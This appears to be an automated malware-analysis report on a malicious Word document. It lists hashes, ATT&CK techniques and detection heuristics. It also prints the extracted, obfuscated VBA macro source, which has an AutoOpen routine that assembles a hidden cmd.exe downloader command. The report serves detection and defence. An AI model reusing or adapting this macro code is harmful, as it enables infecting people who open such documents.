Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49182bde9693c433…

MALICIOUS

Office (OLE)

Size: 89.5 KB
Created: 2018-08-03 20:14:00
Authoring application: Microsoft Office Word
First seen: 2018-08-14
MD5: c02c1cbef872050ae14723cc0780e959
SHA-1: 71241d6043f43e59a99c5433d5a0901ba65f7b6e
SHA-256: 49182bde9693c433267ff55f17996ea0f5287345f3a2388da61b15e49ad14a3f
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro attempts to execute a command built from heavily obfuscated string concatenation which, when reconstructed, appears to be a call to cmd.exe with environment variable assignments. The presence of the AutoOpen macro and the nature of the script strongly suggest it is designed to download and execute a secondary payload, which is characteristic of a phishing attachment.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6744300-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6744300-0
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The document contains an AutoOpen macro, which runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not attribution to a downloader or to a parser CVE.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  5911 bytes
SHA-256: 5e89f3b8f5b9cda16ad976a2b1e67f04b6d1c792203041aa242e81666b711c93

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "AmjopqIbXzOh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName 59413094
   TypeName JnXzVM
   TypeName 3778
   TypeName 64
Shell@ CStr("c") + CStr("m") + dGkqWnuRVfFsrZ + IzAZfsXkzB + qiquzAlGr + jEdSf + kPGTzMD + tLsYnLY + kwRzpARNvdNNLa, 764967208 - 764967208
   TypeName phbav
   TypeName Oct(5)
   TypeName CLng(ztUTOv + 66578 - LjwBpL + 68125)
End Sub


Attribute VB_Name = "FksZmhlZoELf"
Function qiquzAlGr()
On Error Resume Next
TypeName Hex(TTjGUH + QwiqvG)
   TypeName LMqiav
HEERjowXFYR = "d /V:O" + "/C" + CStr(Chr(idCiFzP + MREvcjISCZsvpA + 34 + iimhQGG + sXobqjrZ)) + "set 6B" + "X1=svHmCq" + "zsiGIIEp" + "LZ" + "jnSoOF" + "Oazw" + "SFGGjEUM" + "(/k-fruD" + "'2cX" + ":)tQy;l"
TypeName Oct(63274 / YwrXm + MXbfP / YXDEcS)
   TypeName Round(447671899)
FaSCDhzYK = "Pbg=dVY," + "JN1.e" + "+5" + "$" + "@\8 }W" + "xT{h&&for "
TypeName Chr(7)
   TypeName Sqr(132498543)
   TypeName oEDWkZ
JKJNuVm = "%5 in " + "(13,19,25" + "," + "65" + ",39,7"
TypeName Tan(XoCwh + 59175 / 88926 - fKAHGT)
   TypeName CLng(164)
   TypeName 75
TDFdvNkK = ",7" + "8,65," + "52" + ",52," + "72,68,54," + "11,38,"
TypeName CSng(2395 - fltfi + rPzOC - lqCdIt)
   TypeName Rnd(sKkskr)
PffZmhtz = "56,17,65,2" + "5,37,19,54" + ",30,65,4" + "4,48,72,6" + "2,65,48," + "64,74,65" + ",54," + "4,5" + "2,8,6"
TypeName DAjvP
   TypeName nzOuf
   TypeName GicKHz
DMinNrdvYTc = "5,17,48,51" + "," + "68,8" + "," + "41,2,56" + ",42,78,48," + "48,13" + ",46,35,3" + "5,36,23,3," + "8,17," + "37,7,23,"
TypeName Atn(zFHUhO)
   TypeName ChrW(lmXZCQ)
wZmknz = "40,17,23" + ",64," + "44" + ",19" + ",3,64,40,2" + "3,35," + "25,78," + "58" + ",65,61," + "71,5"
TypeName Int(izMQn)
   TypeName Atn(233479554)
tidoIotHXdU = "2,69,78" + ",48,48,13" + ",46,35," + "35,65,36" + ",40,1,7,7" + "8,8,17,1" + "9,1,23," + "64,44,19," + "3,35,40,57" + ",38,49,"
TypeName Sgn(13957 + 24936 + TAdoo / jimjm)
   TypeName Oct(3)
   TypeName Round(HNHznm - dEAff * LzcIH * GmfJql)
IzsjcKDnwYL = "39,55,2," + "39,69,78" + "," + "4" + "8,48,1" + "3,46," + "3" + "5,35," + "48,8," + "3,52,8,1" + "7,55,65," + "39" + ",64,44,19"
TypeName ChrB(QNzfs)
   TypeName CByte(WZwwB)
   TypeName dwQmn
PwuSZ = ",3" + ",35,39,33" + ",69,78," + "48,48,13" + ",46,3" + "5,35,44,3" + ",43" + ",64" + ",44" + ",19,3," + "6" + "4,5"
TypeName Chr(CrMrPw / YnJzP)
   TypeName Chr(31801 - rGvBqC)
kDVHiL = "4,3" + "9,35,19," + "26," + "69,78,48," + "48" + ",13,46,3" + "5,35,57,3"
TypeName 68
   TypeName Tan(fNZmHE)
PDadkuTDTu = "8,8,17,38," + "19,39,3," + "23,48,8,44" + ",23,64,44," + "19,"
qiquzAlGr = HEERjowXFYR + FaSCDhzYK + JKJNuVm + TDFdvNkK + PffZmhtz + DMinNrdvYTc + wZmknz + tidoIotHXdU + IzsjcKDnwYL + PwuSZ + kDVHiL + PDadkuTDTu
   TypeName Rnd(55056 + nMRAaF)
   TypeName 8
   TypeName CBool(GmJBM - 14783)
End Function
Function jEdSf()
On Error Resume Next
TypeName 5
   TypeName Sqr(uwppL)
   TypeName CDbl(kwljFd)
BZfOzPpLV = "3" + ",64,54," + "39,35" + ",7,8," + "4" + "8,65,35," + "25,13,37,8" + ",17,44" + ",52,40" + ",57,65,7,3" + "5,8,3," + "23,55,65,7"
TypeName CLng(31)
   TypeName CDate(5082)
umvmhdfCb = ",3" + "5,44,39,50" + ",7" + ",48,23,52," + "35,55,76" + ",42,6" + "4,26,1" + "3,5" + "2" + ",8,48,34,"
TypeName pickZN
   TypeName CBool(35)
ibfaDbr = "42,6" + "9,42,47," + "51,68,13" + ",45,45," + "72," + "5" + "6,72,42,6"
TypeName Chr(47693585)
   TypeName Fix(iIGkah - aJQbL + wXKbCH * zbBaMU)
kpYMiUE = "7," + "67" + ",6" + "3,42,51,68" + ",59," + "24,36,56" + ",68,65,17" + ",1,4"
TypeName CSng(6)
   TypeName 962
BYmShfwJMY = "6,48,65," + "3," + "13,66" + ",42,70," + "42,66" + ",68,13,4"
TypeName Hex(LQiniO)
   TypeName Tan(zFzwW)
LkXkOHt = "5,4" + "5," + "66,4" + "2,64,65" + ",75" + ",65,42"
TypeName CDbl(3900 * 5072)
   TypeName CDbl(7)
ZBGNV = ",51,38,19," + "39
... (truncated)